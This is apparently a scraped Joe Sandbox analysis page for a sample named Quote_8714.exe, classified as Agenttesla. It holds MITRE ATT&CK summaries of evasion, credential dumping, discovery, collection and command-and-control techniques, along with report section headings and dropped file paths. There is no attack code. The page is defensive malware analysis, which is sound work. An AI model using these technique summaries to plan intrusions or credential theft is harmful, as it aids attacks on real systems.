Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Quote_8714.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Quote_8714.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4mpx2ckq.g3y.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e43ech1r.hl4.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lidrmltf.ygb.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ysu0wl3r.bhc.ps1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Windows Analysis Report
Quote_8714.exe

Function 04F276C8 Relevance: 14.5, Strings: 11, Instructions: 727
COMMON

Function 04F276B8 Relevance: 14.4, Strings: 11, Instructions: 678
COMMON

Function 04FFF920 Relevance: 2.8, Strings: 2, Instructions: 320
COMMON

Function 04FF2EF0 Relevance: 2.8, Strings: 2, Instructions: 253
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre